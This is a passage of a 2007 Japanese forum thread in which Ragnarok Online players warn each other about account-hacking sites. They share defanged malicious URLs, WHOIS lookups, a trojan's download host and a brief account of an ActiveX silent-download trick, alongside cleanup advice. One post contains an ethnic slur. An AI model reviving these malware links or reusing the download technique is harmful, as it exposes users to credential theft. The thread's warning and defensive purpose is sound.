しかもこれが彼らの持ちドメインのほんの一部だってのがすげぇ…。

443 名前:(^ー^*)ノ〜さん :07/04/06 21:05 ID:wuJO1F000
運営黙りだもんな、告知の一つもださないし
他のゲームはどうだかわからないけどもなんらかの注意呼びかけくらいしたらって思う
BOTも増える一方だし悪化の一途だなぁ

λ... <LiveRo行ってくる…

444 名前:(^ー^*)ノ〜さん :07/04/06 21:06 ID:w7CluOoW0
警察:管理会社が動けば捜査する。
      ↓  ↑
管理会社:警察が動けば事態を収拾する。
     │└→─┘
     ↓(ここまでたらい回し)
   垢ハック引退加速。
      ↓
警察と協力して対策をする予定です(数ヵ月後の公開質問)
      ↓
  RO2の垢ハックが実装される

445 名前:(^ー^*)ノ〜さん :07/04/06 21:15 ID:jLB/OHvl0
もう終わってる・・・って煽りは置いといて
警察に駆け込む人が増えたら会社に注意とか警告とか行かないものなのかね

446 名前:(^ー^*)ノ〜さん :07/04/06 21:19 ID:bHc8OvZf0
>>434
222.77.185.84
slower-qth 8651262
wikiwiki-game 8651262

222.77.185.88
game-mmobbs bbs
ragnarok-sara bbs
aurasoul-visjp bbs

実質2つ。
他2つはたぶんダミーとして混ぜた普通のファンサイト。

447 名前:(^ー^*)ノ〜さん :07/04/06 22:12 ID:qCv7Nf8W0
実際大半のネトゲがターゲットされているっぽい。
どのゲームでも今後常時垢ハックの脅威が付きまとう事になる。
まぁメールやらMixiやらのパスも盗まれて来てるんで、何もかも危ないとは言えるが、
ネトゲに限ってはRMTが無くならない限りは今後延々とこの攻撃は来るだろう。
悲しいがネットゲーもお手軽に遊べるものではなくなって来た訳だ。辛いな・・・

448 名前:(^ー^*)ノ〜さん :07/04/06 23:10 ID:58qEalhu0
ゲームに限った事ではないだろ
リアル・オンライン問わず支那畜滅ぼさん限りどんどんヤバくなってきてる

449 名前:(^ー^*)ノ〜さん :07/04/06 23:12 ID:GLdDpdyK0
法律が追いついてないんだよな
もはや国際犯罪なのに・・・

450 名前:(^ー^*)ノ〜さん :07/04/07 03:12 ID:bll/Z8/d0
同じ手口を使って、ネットバンキングのIDとパスを抜くこともできるはずで、
そっちの方が稼ぎが多いだろうに、実際にはネトゲのアカハックの件数が圧倒的に多いんだよね。
(泣き寝入りしてる件数は多分ネトゲの方が圧倒的に多いと思うから、実際は下表以上の差があると思う)

●不正アクセス行為後の行為の内訳(平成17年,平成18年)
H17 H18 不正アクセス行為後の行為
--- --- ---------------------------------------
356 593 インターネット・オークションの不正操作
140 257 オンラインゲームの不正操作
005 039 インターネットバンキングの不正送金
031 032 ホームページの改ざん・消去

銀行の方はIDカードやワンタイムパスワードなどを導入しているところもあって、
ネトゲのそれよりセキュリティレベルは高いとはいえ、この差はいったい・・・

451 名前:(^ー^*)ノ〜さん :07/04/07 05:45 ID:cvvwINAW0
レベルが高いどころかネトゲなんかとは次元が違う

452 名前:(^ー^*)ノ〜さん :07/04/07 06:27 ID:DbRDg0sx0
ユーザの数もけっこう違うんじゃ
俺怖くてネットバンクなんて使えねえ

453 名前:(^ー^*)ノ〜さん :07/04/07 07:05 ID:d99PAcor0
法の関係などで捕まる可能性がネットバンク>>>>>>>>>>>>>>>>>ネトゲなんじゃないかね。
中華が偽クレジットで360パック買いまくり事件の時も実際の金を引き出すより、
ネトゲのアイテムを換金した方が足がつかないからとか言われてたし。

454 名前:(^ー^*)ノ〜さん :07/04/07 07:06 ID:d99PAcor0
すまんセキュリティ対策スレ向きだったかもしれん。

455 名前:(^ー^*)ノ〜さん :07/04/07 08:21 ID:F8o15U1e0
http://www■gangnu■com/
http://www■cetname■com/

報告あるかちょっと判らなかったんだけど
新たな書き込みを発見
どちらもlovetw行きのようです

456 名前:(^ー^*)ノ〜さん :07/04/07 09:42 ID:RMFUntYQ0
多分、全部既出ですが、某ツール系掲示板に貼られたもの。

285 優しい悲劇 New! 07/04/06 23:06 ID:5GYsMbxA
http://www■geocitylinks■com/links/

860 No Name New! 07/04/07 05:49 ID:3qihWBmE
Ro 装備. 血盟すれっど
陽光RO会社 URL: http://www■aaa-livedoor■net/ro-navi/
Ro 公式ページRo 狩場 Ro 武器、防具製作.
者Ro 攻略
◆Gunho-Online-Entertainment内部告発◆
>記事全文まとめ。
http://www■ro-bot■net/10657/
>雑誌記事の取り込み画像
http://www■gemnnammobbs■com

457 名前:(^ー^*)ノ〜さん :07/04/07 11:45 ID:rAfTz0bw0
連中は本当に節操ない、紀藤弁護士サイトの掲示板にもlinkcetouが貼ってあった。
検索でbbs、blogがヒットすれば何処でもいい感じだな。
ロボット避けしてるところには来ないみたいだから、
検索回避できるサービスに引っ越すのも一つの手だ。

458 名前:(^ー^*)ノ〜さん :07/04/07 12:22 ID:KB2IA8Oo0
天安門って単語を紛れさせとくってのは実際どうなの?
半分ネタで言われてる気もするけど、意外と効果ある気もしなくはない

459 名前:(^ー^*)ノ〜さん :07/04/07 12:35 ID:RMFUntYQ0
>>458
雑談スレへ行けよ。気休めにしかならない。無駄。以上。

460 名前:(^ー^*)ノ〜さん :07/04/07 12:38 ID:KB2IA8Oo0
はいはい雑談雑談^^;;;

461 名前:(^ー^*)ノ〜さん :07/04/07 13:23 ID:rAfTz0bw0
アカハクドメインでサーチしたらまた発見

ドメイン情報や記事日付などから見て改竄された可能性極大。

掲示板で見つけたもの、TOPにリンクがないので放置しているものを改竄したものと思われる
ttp://www■omakase-net■com/minamiblog/index■html

TOPにもIFRAMEが仕込まれている。
ttp://www■omakase-net■com

462 名前:(^ー^*)ノ〜さん :07/04/07 14:33 ID:lU56R3n90
ヤフー検索から踏んでしまったのだがこれって怪しい?
内容が真っ白だった

www.ip-checker.net

463 名前:(^ー^*)ノ〜さん :07/04/07 14:53 ID:wNItL2ZE0
>>462
※このスレは『勇気が無くて見れないサイト解説スレ』ではありません

当方の環境ではページが表示された。
内容は自分のIPアドレスを確認(表示)するだけのサイト。
特に不審点は見あたらない。

あと「真っ白だから怪しい」とか、ページの内容で
危険の有無を判断しない方が良いと思います。

464 名前:(^ー^*)ノ〜さん :07/04/07 14:55 ID:Wi4CabO50
テンプレぐらい読んでから来い

465 名前:(^ー^*)ノ〜さん :07/04/07 14:59 ID:89misOZw0
>>463-464
RMT業者が被害者を装って書き込んだ釣りだと思うけどな
中華だけでなく日本人業者もMMOBBSを見てる

466 名前:(^ー^*)ノ〜さん :07/04/07 17:27 ID:UVLSaEXR0
ついさっきまで普通にログインできてたキャラパスが
鯖キャンで落ちて以降、入力しても違うと弾かれるんだが・・・
5キャラ全て同じ長いパスで4キャラは全部INできるんだが
1つだけ弾かれる。
オンラインスキャンしてもウィルス出なかったし、何か不安だ。
今はコールセンターの返答待ちだが、急にこうなるなんてマジ心配だ。

467 名前:(^ー^*)ノ〜さん :07/04/07 17:49 ID:go3ipWXA0
心配するなら全キャラ別々のパスに変えておけ

468 名前:(^ー^*)ノ〜さん :07/04/07 18:42 ID:d99PAcor0
いや、もし外部から何かで抜かれてるんだったら変えたらまずいだろう。

469 名前:(^ー^*)ノ〜さん :07/04/07 18:55 ID:DbRDg0sx0
>>466
とりあえずカスペあたりでチェックしたら?

470 名前: ◆sp4Sh9QXGI :07/04/08 02:03 ID:RQo21nzW0
www■omakase-net■comほかのドメインを追加しました。
↑は一応PG2のリストにも登録してあります、ご確認ください。
それでは…おやすみなさい

471 名前:(^ー^*)ノ〜さん :07/04/08 07:48 ID:RcbO+aZW0
以下R.O.M776のフリー掲示板に貼られていたものです。
この書き込みをした段階では削除されていないので踏まないように注意。

-----------------------------------------------
■31638 / inTopicNo.1)  big-boob
□投稿者/ Nicole @ -(2007/04/07(Sat) 21:04:52) [ID:CVtBuCxu]
ttp://tedstate■info/big-boob

話題の種別:[その他雑談] 

Sentimental and nostalgic. Great.+
-----------------------------------------------

メール欄が
rom776tesy@tesy■tesy
ってなってたのだけど…
こんなところまでそれっぽく見せようと偽装しているのかなと。
RO起動中にこの書き込みを見たのですが
踏んでいなくても、本当に踏んでいないか怖くなって
いまカスペルさんオンラインチェック。
まあ…踏んでいたらもうアウトなんですけどね。

それにしてもこのオンラインチェック、
当方のPCはROの起動スペックギリギリで
ウイルスバスターも裏で動いているのにもかかわらず
なんだか軽めな好印象。
プロ北Dで篭りながらでも凄い処理落ちせずにBB狩りできていたり。

472 名前:(^ー^*)ノ〜さん :07/04/08 09:42 ID:EUtlr+gb0
>>471
アカハックとは関係なさそうだが、
怪しげな海外のアダルトサイト?に飛ばされる模様。

tedstate■info
Registrant Name:Igor
Registrant Organization:N/A
Registrant City:Tallinn
Registrant State/Province:0
Registrant Postal Code:13621
Registrant Country:CN

↑の飛び先が↓
www■giftsee■com
Name: igor
Company: N/A
City: tallinn
State: Harjumsa
Country: EE


tallinn = タリン(エストニアの首都)
EE = エストニア
CN = 中国

473 名前:(^ー^*)ノ〜さん :07/04/08 09:56 ID:6DD8wVlc0
最近.comのアドレスには相当警戒して飛ぶようにしてる
怪しいと思ったらaguse活用するクセつけたほうがいいね

474 名前:(^ー^*)ノ〜さん :07/04/08 11:02 ID:Azuo1E0s0
ネトゲにかかわらず、最近の中華は何でも有りだな。
酷すぎるわ・・・

475 名前:(^ー^*)ノ〜さん :07/04/08 11:36 ID:NPso5GFD0
よくわからないんだけど踏んだだけでアウトなのかな?
DL窓出てDLしたらアウトなのか、URL踏んだだけでアウトなのかわからないんだが

476 名前:(^ー^*)ノ〜さん :07/04/08 11:39 ID:6DD8wVlc0
白い画面見た時点でアウトなんじゃ

477 名前:(^ー^*)ノ〜さん :07/04/08 12:01 ID:xl0iZ6GXO
踏んだだけでアウトってのが普通だろう

478 名前:(^ー^*)ノ〜さん :07/04/08 12:03 ID:NPso5GFD0
俺少し前に踏んでPC詳しいやつに聞いたんだが
開いて窓が出てそれをDLしたらアウトって言われたんだ
それから5ヶ月経って平気だけど、今は踏むだけでアウトなの?

479 名前:(^ー^*)ノ〜さん :07/04/08 12:10 ID:QEPwDwEC0
今はOSやアプリケーションの脆弱性を利用して、
ユーザーの確認なしに勝手にプログラムをダウンロード→実行させるという
手口の物がほとんどなので、「開いて窓が」でない方が普通。
踏んだだけでアウトと思った方が良い。

480 名前:(^ー^*)ノ〜さん :07/04/08 12:12 ID:6U4I+m6N0
そんなもんモノによるがな

未知の脆弱性を突くやつなら踏むだけでアウトかもしれんし
しょぼい手法なら踏んでも大丈夫かもしれんかもしれん

本当に詳しい奴だったんならソース見たりして動作把握してたんじゃねーの

481 名前:(^ー^*)ノ〜さん :07/04/08 12:13 ID:6qXeejkL0
>PC詳しいやつに聞いたんだが開いて窓が出てそれをDLしたらアウトって言われたんだ

そいつは1000%知ったかぶりなんちゃってヘビーユーザー

482 名前:(^ー^*)ノ〜さん :07/04/08 13:06 ID:NPso5GFD0
やっぱり心配になってきた・・

【  アドレス   】 http://www■cityhokkai■com/links/
【気付いた日時】 3月8日
【     OS    】 WinXP HomeEdition
【使用ブラウザ 】 (IE6)
【WindowsUpdateの有無】 3月28日
【 アンチウイルスソフト 】 avest
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】 何も見つからず
【スレログやテンプレを読んだか】 Yes
【説明】
友人のブログに、別の友人の名前を騙った書き込みで踏んでしまいました

483 名前:(^ー^*)ノ〜さん :07/04/08 13:11 ID:IF5epI9H0
>【スレログやテンプレを読んだか】 Yes
>【説明】
>友人のブログに、別の友人の名前を騙った書き込みで踏んでしまいました

テンプレの対処法のうち、なにを行なったか。
わからないところがあるか。(また、それはどこか)

484 名前:(^ー^*)ノ〜さん :07/04/08 13:20 ID:NPso5GFD0
感染の可能性のあるPCはケーブルを外し
別のPCからパスの変更は行いました

485 名前:(^ー^*)ノ〜さん :07/04/08 13:25 ID:IF5epI9H0
>>484
あとは、踏んだPCだけだね。

踏んだ時に取った行動は?どんな画面で、どんな操作を行なったか。
踏んだ可能性が高いなら、確認と除去作業が必要。

ブロックできたのか、踏む前だったのかわからない場合で、自分の使っているセキュリティソフトで
反応しない場合、複数のセキュリティソフトで再度スキャンすることが望ましい。
各社のオンラインスキャンを試みること。

486 名前:(^ー^*)ノ〜さん :07/04/08 13:30 ID:IF5epI9H0
>>482のアドレスは、現在ページが見つかりません。hostsでブロックしてるせいだな。
このページのものが、何という名前で引っ掛かる代物か確認できない。orz

487 名前:(^ー^*)ノ〜さん :07/04/08 13:33 ID:NPso5GFD0
白い画面のサイトに繋がり、ページは即閉じてavestでスキャンかけました
結果は何も見つからず不安だったので
カスペルスキーオンライン ウイルス&スパイウェアスキャナも試みましたが
何も見つかりませんでした

488 名前:(^ー^*)ノ〜さん :07/04/08 13:47 ID:IF5epI9H0
最善の解決方法
現時点(もしくは踏んだ時点)で置かれているのが○○で、△△というソフトなら検知できる。
△△で発見できなかったので、感染していないと思われる。(現時点で、誰かがモノを確認しないとだめ)
時間帯などによって、差し替えられる可能性があり、踏んだ時点と、確認した時点に時間差があると
信用できない場合が有る。

現在、モノの確認報告がないので、大丈夫(に近い)と保証することはできない。

スキャン結果を信用して、感染(トロイダウンロード)前に、切断したと判断するか、
検知されないだけで、感染しているためOSの入れなおしから行なう必要があるか
「自己責任」で判断して欲しい。他人の立場では判断できない。

不安の解消が目的であれば、バックアップをとって、OSの入れなおしを。
PCのゴミファイルや不用なレジストリなどもクリアされた状態に戻るので、ただの時間の無駄にはならないと思う。

もしくは、別HDDなどに環境を構築してそちらから起動し、そこの別種のセキュリティソフトを導入。
検知できるソフトが出てくるまで、セキュリティソフトをとっかえひっかえ入れ替えて見ることもできる。

489 名前:(^ー^*)ノ〜さん :07/04/08 14:14 ID:QVxh66o10
未然に防いだ&OSクリーンインストール済みの事例だけど
かなり特殊な方だと思うので晒してみる
(+日時的にアニメーションカーソルの微弱性をついたものと思う)

【      気付いた日時          】3/30
【不審なアドレスのクリックの有無 】 履歴を見た限り無かった
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】No
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 FileFox 2.0.3
【WindowsUpdateの有無】 3/30
【 アンチウイルスソフト 】 NortonInternetSecurity200)
【その他のSecurty対策 】 Spybot S&D、PeerGuardian2
【 ウイルススキャン結果】 どちらでも検出されず
【スレログやテンプレを読んだか】 Yes
【説明】其の日はPukiwikiのプラグインやCSS・Web関連のサイトを回っていたので
どこで踏んだかは実は判っていない。
3/30未明にROを起動するとPG2が遮断警告を出すので何事かと思ったら
lovetwへのアクセスをブロックしていた。

一応クリーンインストール前に知り合いに装備とお金を預けOS再インストール
→再インストール後Pass全部変えた

490 名前:(^ー^*)ノ〜さん :07/04/08 14:14 ID:QVxh66o10
OSが抜けてた

Windows XP SP2

491 名前:(^ー^*)ノ〜さん :07/04/08 14:18 ID:QVxh66o10
よく見たらOS以外もぼろぼろなので訂正を

ブラウザ FireFox 2.0.3
アンチウイルスソフト→NortonInternetSecurity2007

そそっかしすぎる・・・ orz

492 名前:(^ー^*)ノ〜さん :07/04/08 14:38 ID:NPso5GFD0
色々教えて頂きありがとうございます
念のためも1度スキャンして、それでも不安だったら再インストールしてみます
もしかしたらまた来ます…;

493 名前:(^ー^*)ノ〜さん :07/04/08 15:51 ID:YXWBfEH/0
スパエウェア、ウイルスどれも感染0なら安心していいんだろ?
5ヶ月ぶりに一ヶ月やるんだがいきなりハッキングされたら飽きれるがよwwwww
とりあえずチェックして大丈夫だと判断したからログインs低見る

494 名前:(^ー^*)ノ〜さん :07/04/08 15:56 ID:6DD8wVlc0
お前の文章がハッキングされてる
すぐに頭を再インストールするんだ

495 名前:(^ー^*)ノ〜さん :07/04/08 16:03 ID:IF5epI9H0
>>493
そういった一般的相談はLiveROのスレへどうぞ。

>スパエウェア、ウイルスどれも感染0なら安心していいんだろ?
スパエではなく、スパイウエア。

自分が検出に使ったソフトのパターンに存在しない新種は見付けられない。
だから、100&%安全という保証はできない。自己責任で好きにしな。

496 名前:(^ー^*)ノ〜さん :07/04/08 16:38 ID:rbiwzu/z0
騎士スレで質問しても返答がなかったので質問。
騎士Wikiの参考データのセット装備のところをクリックしたら
真っ白なページに飛びました。
左のメニューは表示されたまま 右側が真っ白。
編集ページで確認してみたら内容はなし。
これは、ページ内容が作成されていないだけで、垢ハックとかは関係なしですか?
それとも真っ白ページを装ったウィルスなどもあるのでしょうか?

497 名前:(^ー^*)ノ〜さん :07/04/08 16:43 ID:MNB5IRqA0
そんなんしらねーよ不安なら2.3社ウイルススキャンでもしてこいよ

498 名前:(^ー^*)ノ〜さん :07/04/08 16:56 ID:IIwsoYJP0
ページが作りかけなだけ。
誰も作る気がないのだろう。

499 名前:(^ー^*)ノ〜さん :07/04/08 17:34 ID:E9QlnQ8A0
>>486
>>482のはカスペルスキーのファイルスキャナで
PSW.Win32.Maran.cjと判断されるトロイを取り込んでいる。
トロイの置き場所は www■kuronowish■net/links/server■exe で
環境変数TMP(通常はc:\windows\TEMP)の場所に保存実行するお馴染みの方法。
保存時のファイル名はL_ky60.comだが
実行後にこのファイルを消去して証拠隠滅をするかなどは不明。

500 名前:(^ー^*)ノ〜さん :07/04/08 17:49 ID:9+UiDFV10
>>496
あんた、wikiってしってっか?

501 名前:(^ー^*)ノ〜さん :07/04/08 22:52 ID:AdN7MDv/0
>>478
ある程度わかってる人は踏んでもたいした被害ないようにしてるけど
よくわかんない人の場合は踏んだだけでアウトと考えていいよ。

>>493
安心してよくないよ。
新型や亜種がどんどん生まれてるから検知できてないだけって可能性も充分ありえる。

502 名前:(^ー^*)ノ〜さん :07/04/09 01:47 ID:nn2CJp2u0
>>478
例えば、VBScriptでActiveXコントロール(Adodb.Streamなど)を生成して、
ファイルをダウンロードする手法は、多くのアカハックサイト(>>482もまさにそれ)で使われてるが、
脆弱性がある状態だと、何の確認ダイアログも出ず、勝手にファイルがDLされ実行される。

ただし ttp://support.microsoft.com/kb/870669/ja のページに解説されている脆弱性を
塞いでおけば感染しない(Adodb.Streamの生成で失敗する)ことはうちのPCでは確認した(※)
(2年以上前の脆弱性だし、Windows Updateをしていれば、この脆弱性は勝手に塞がれるので手動でやる必要はない)

※あくまでもうちの環境で大丈夫だったというだけで、人様の環境でどうなるかは不明。

503 名前:(^ー^*)ノ〜さん :07/04/09 07:45 ID:CPWs0wlQ0
wikiはウィルスな山なんだぜ
そんなところのリンク先なんて踏んじゃだめだよ

というかwiki自体みるな

504 名前:(^ー^*)ノ〜さん :07/04/09 08:23 ID:DvDjRiVl0
>>503
カエレ。その持論は雑談スレで一人で語っててくれ。

505 名前:(^ー^*)ノ〜さん :07/04/09 10:56 ID:stkHKIS60
インターネットはウィルスな山なんだぜ
そんなところにネット接続したらだめだよ

というかPCを窓から投げ捨てろ

506 名前:(^ー^*)ノ〜さん :07/04/09 11:26 ID:DvDjRiVl0
spamと垢ハック混在と思われます。
久しぶりに覗いたrosvのBBSから。(アドレスのない行のみ引用)

6546:の雪う影 > の雪う影ro blog http://bqdr■blog98■fc2■com/ (2007/04/09 04:34:50)
6528:トトメス > ラグナロクの攻城戦ですよ(´-_-`) http://www■omakase-net■com/minamiblog/index■html (2007/04/07 23:01:08)
6508:相田由真 > http://www■gsisdokf■net/online/ (2007/04/05 15:13:40)
6503:Ro 公式ページRo 狩場 Ro 武器、防具製作■ > http://www■ro-bot■net/10657/ (2007/04/04 19:17:57)
6502:ひっとん > 神器材料買取してます、何かあればお声をおかけください。http://nikang■blog79■fc2■com (2007/04/04 13:10:10)
6501:ひっとん > RO歴史の上で最も変態の装備.http://bqdr■blog98■fc2■com (2007/04/04 13:09:16)
6499:井上晴美 > http://www■gsisdokf■net/online/ (2007/04/03 22:50:45)
6498:井上晴美 > http://www■gsisdokf■net/online/ (2007/04/03 22:50:42)
6496:夏木彩 > 渚音楽祭2007春 の情報はもちろん、プレゼントやアーティストの最新情報もチェックできるYO-CHECK(ヨーガク★チェック)の登録はこちらから!http://urpoka■blog75■fc2■com/ (2007/04/03 21:49:43)
6495:渡辺潤 > 完全収録女子高校美女ギリギリモザイク バコバコhttp://www■ragnarokonline1■com/ro■htm (2007/04/03 14:52:01)
6493:MMOファイナンス > 天国の装備は売買しますhttp://www■blog-livedoor■net/game/ (2007/04/03 11:51:57)
6475:愛よりSEX > オナニーから生身の女性のマ○コで発射するのが当たり前の生活http://www■18girl-av■com/bbs/ (2007/03/29 16:47:03)
6416:シルヴィア > :レイド討伐隊 > 韓国攻略情報 http://www■hosetaibei■com/bbs/ (2007/03/23 21:41:59)
6413:帝国の誉れ > LINEAGE1商人:http://www■asdsdgh-jp■com/online/ (2007/03/23 10:56:51)
6407:レイド討伐隊 > 韓国攻略情報 http://www■RAGNAROX■mobi/bbs (2007/03/22 20:51:25)
6404:sdsad > 友たちはよい http://www■rokonline-jp■com/blog (2007/03/22 14:57:38)
6371:ネ申のテンプレ > http://www■rokonline-jp■com/blog (2007/03/20 17:56:47)
6368:天国の装備は売買します > 本人は長期にわたり天国の遊ぶ各種の装備を売って、中の伝言を招く装備しなければならないのがあって、ウェブサイトの中に本人の連絡用電話があります:http://www■netgamelivedoor■com/online/ (2007/03/20 13:13:07)
6363:浅倉響一 > 通行する小さいこつ!http://www■biglobe-ne■com/bbs/ (2007/03/19 21:35:56)
6358: 櫻井孝宏 > http://www■conecojp■net/online/ (2007/03/19 12:41:14)
6329:クリ剣士 > http://www■game-fc2blog■com/chaos (2007/03/17 15:06:20)
6327:武器と防具を精錬する鍛冶屋さん > http://www■interzq■com/bbs (2007/03/16 16:05:22)
6326:ROは格闘する > http://www■din-or■com/bbs (2007/03/16 16:04:33)
6325:や攻撃などの > 商人の装備品 http://www■game-fc2blog■com/chaos (2007/03/15 10:42:42)
6324:や攻撃などの >  商人の装備品 http://www■game-fc2blog■com/chaos (2007/03/15 10:41:33)
6322:ro狩場 > 詳しくは:http://www■biglobe-ne■com/bbs (2007/03/14 18:16:01)
6321:小説系置き場 割とメインコンテンツ > http://www■6828teacup■com/bbs (2007/03/14 12:57:41)
6316:資産10Gオーバーらしい > http://www■interzq■com/bbs (2007/03/12 20:43:16)
6312:商業ロック > 商業ロック http://www■6828teacup■com/bbs (2007/03/12 18:20:52)
6311:紫苑 > 販売 +4錐 http://www■lineagecojp■com/rolink/ (2007/03/12 18:02:44)

507 名前:(^ー^*)ノ〜さん :07/04/09 11:51 ID:jJj6ioBI0
そういや昨日、未実装Wikiの「神器」ページが改ざんされてた。
既存の垢ハックURLで文字列置換処理されてたので被害は全くなかったはずだが。
改ざんされた時間はたしか4/8の18時〜19時代。
その時間のログから管理人さん処分よろしく。

508 名前:(^ー^*)ノ〜さん :07/04/09 11:54 ID:kMUZqm3J0
アカハック蔓延し過ぎでワロタ。

509 名前:(^ー^*)ノ〜さん :07/04/09 11:58 ID:DvDjRiVl0
>>507
該当Wikiのコメントに書かないとだめだろ。ここじゃWIkiの管理人さんが見てるかどうか不明。

510 名前:(^ー^*)ノ〜さん :07/04/09 15:18 ID:6b7wqa2W0
>>506
サイト自体放置だが、もうこれは閉鎖した方がいいよな・・。

511 名前:(^ー^*)ノ〜さん :07/04/09 15:25 ID:DvDjRiVl0
>>510
BBS見に行く人は稀だし、リンクになってないので実害は出てないと思われ

512 名前:(^ー^*)ノ〜さん :07/04/09 18:09 ID:lyIojUXG0
>>510
逆に検体収集用BBSと思えば役に立つ

513 名前:(^ー^*)ノ〜さん :07/04/09 18:13 ID:DvDjRiVl0
>>512
御意w

514 名前:(^ー^*)ノ〜さん :07/04/09 22:10 ID:Qq/xNHjJ0
BBSだけで済んでいるうちはいいけど、連中はサイトクラックによる乗っ取りも常套手段。
そういった意味では、畳んでしまった方が後腐れ無いとも言えなくもない……

515 名前:(^ー^*)ノ〜さん :07/04/09 22:42 ID:yzeXn//00
昔から言われているけど、更新停止して放置されたサイトは危険だね。
ただのHTMLならともかくBBSやWikiはとっとと閉鎖したほうがいい。

516 名前:(^ー^*)ノ〜さん :07/04/10 06:34 ID:Uz/BNsh30
中華の新作らしきモノ。fm7■biz自体は転送サービスのドメインらしい。

-------------------------------------
Ro 装備. 血盟すれっど
陽光RO会社 URL: http■//fm7■biz/1tdp
Ro 公式ページRo 狩場 Ro 武器、防具製作.
者Ro 攻略
◆Gunho-Online-Entertainment内部告発◆
>記事全文まとめ。
>雑誌記事の取り込み画像
http■//fm7■biz/1ygi

517 名前:(^ー^*)ノ〜さん :07/04/10 07:04 ID:9+p53y4S0
>>516
しらべてみた。
http://fm7■biz/1ygi
 → http://www■jprmthome■com/index■htm
 → http://www■jprmthome■com/muxiao1■jpg,
   http://www■jprmthome■com/muxiao2■jpg

画像は先日の.aniに関する奴を使った物。

一応fm7.bizのフォームから通報してみた。

518 名前:(^ー^*)ノ〜さん :07/04/10 07:45 ID:LEIiwyJ50
>>517
http://fm7■biz/1tdp についてHTTPのヘッダを調べてみた。

HTTP/1.x 302 Found
(中略)
Location: http://www■gemnnammobbs■com

Locationヘッダが仕込まれてる。これ自体は転送サービスの正規の機能のようだけど、
このLocationヘッダってやつは、HTMLソースを表示しても当然出てこないし、(ソースチェッカーでは分かる)
スクリプトや自動ジャンプをOFF(※)にしてようが絶対に飛ぶので、なかなかやっかいだな。
Locationヘッダを無効にする設定ってあるんだろうか?

※IEだと、[ツール]-[インターネットオプション]-[セキュリティ]
-[レベルのカスタマイズ]-[ページの自動読み込み]-[無効にする]
Firefoxだと拡張機能RefreshBlockerなど

519 名前:(^ー^*)ノ〜さん :07/04/10 13:39 ID:cyq5zIgN0
ヘッダ上にあるんなら、ProxNの対応コードがあれば楽に防げるじゃない?

俺には今一理解できないから書けないが。

520 名前:518 :07/04/10 15:55 ID:LEIiwyJ50
>>519
オミトロンか・・・うーん。便利そうではあるけど、敷居が高そうだなあ。
とりあえず、Firefoxでリダイレクトを無効にする方法を見つけたので、以下に掲載。
(リダイレクト=HTTPヘッダ中のlocationで指定されたURLにジャンプすること)

1.アドレスバーにabout:configと入力する
2.network.http.redirection-limitという項目をダブルクリックする
3.ダイアログが表示されるので0と入力し、OKを押す
(元に戻したい場合は、右クリックしてリセットを選べば良い)

内容を解説しておくと、まずアドレスバーにabout:configと入力すると
Firefoxで設定可能なパラメータの一覧が表示される。
network.http.redirection-limitというのは、HTTPヘッダでリダイレクト指示が来た場合に
リダイレクトを何回まで行うかという設定で、デフォルトでは20に設定されている。
で、これを0に設定すると、リダイレクトを行なわないことになる。

無効にしたらしたで不便かもしれない。アドレスの最後に/が無いだけとかなら、確認なしで
リダイレクト。それ以外は確認ダイアログを表示してOK押したら、リダイレクト
とかしたいところだが、そうなると敷居は高いが、拡張機能を自分で作るしかないか・・・
あるいはオミトロンか・・・

521 名前:(^ー^*)ノ〜さん :07/04/10 18:37 ID:NiEQtIo90
http://monoganac2■sakura.ne■jp/src/milktea14653■jpg
ROに関係ない場所にも大量に貼られているようだが
RO関係の場所にもいくつか狙ったかのように貼られてあったので怪しいかも分からんね

522 名前:(^ー^*)ノ〜さん :07/04/10 18:46 ID:Vey28yQW0
分からんレベルで張るなよ。

523 名前:(^ー^*)ノ〜さん :07/04/10 19:47 ID:hcbhX8Aw0
>>521
アダルトのUPろだに2ch_flash.jpgという名前の
「まともなRO関係のファイル」がUPされる可能性は限りなく0に近いかと

524 名前:(^ー^*)ノ〜さん :07/04/10 21:44 ID:R3JOKXmw0
BOTが各サイトにウイルスURLを書くことってあるの?

525 名前:(^ー^*)ノ〜さん :07/04/10 22:03 ID:/Jt3zlNd0
>524
BOTと言ってもROとウィルスを考えた場合は2種類ある。
1つはROのゲーム内に腐るほど沸いてるBOT。
1つはウィルス感染したPCが作るネットワーク。

前者のゲーム内のBOTが書くことはまず無い。
ROのID/PASSを2chかどこかに書く罠が仕込まれたBOTが昔あったらしいので
絶対にないとは言えないが、ほぼ無いに等しい。

後者のBOT(botnet)はウィルスに感染したPC群で構築されるネットワークで
PCの所有者が気がつかない間に書き込みに利用される。
ハッキングの踏み台にされたとか言われるのもこのケースだし、どこかの鯖を
墜とすために攻撃に使われたりする。
その時に使われる感染したPCの事をゾンビPCとか呼んだりする。

ウィルス関係の書き込みでBOTと言われるのは普通は後者の方。
Spamメールなんかはこれを使ってる事が多いし、WikiやBBSへの書き込みも
こういうゾンビPC経由が多いと言われてる。

526 名前:(^ー^*)ノ〜さん :07/04/10 22:14 ID:R3JOKXmw0
なるほどぉ
BOTネットを経由しないBOTもいるのでしょうか?

例えばPCでネットサーフィンからBOT(自動化)でRO・ラグナロクなどの単語が含まれるサイトに
自動でウィルスURLをうpするとか

527 名前:(^ー^*)ノ〜さん :07/04/10 22:55 ID:Vey28yQW0
なんか分かっていない予感。

528 名前:(^ー^*)ノ〜さん :07/04/10 23:43 ID:WaiojZlZ0
>>526
BOTネット使わずとも、そんなんは、自分とこでスクリプト動かすだけで事足りるよ。
セキュリティ一般の雑談にあたるので、LiveROの方が適切だと思う。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

529 名前:(^ー^*)ノ〜さん :07/04/11 17:17 ID:d0xY08KZ0
とうとう奴らと来たら何か書き込める場所と見れば
見境無く垢ハックURL書き込むようになった気配
ROと全く関係ないゲームの掲示板に垢ハックのURLが書いてあった
時には正直どうしようかと思ったわ・・・

530 名前:(^ー^*)ノ〜さん :07/04/11 19:28 ID:ypPOX6uN0
別にもう対策とかどうでもいいんじゃね?
サービス終了も近いんだしさ
被害届け出さなきゃ警察は一切動かないんだから、いっそ被害者になって(ry

531 名前:(^ー^*)ノ〜さん :07/04/11 19:42 ID:vF8WXMEQ0
はいは〜い
被害者になりました

僕捨て垢がハックされて
ジャベリン盗まれました

532 名前:(^ー^*)ノ〜さん :07/04/11 19:46 ID:ypPOX6uN0
それって動いてくれたん?だったら俺もやるわー

533 名前:(^ー^*)ノ〜さん :07/04/11 21:02 ID:vF8WXMEQ0
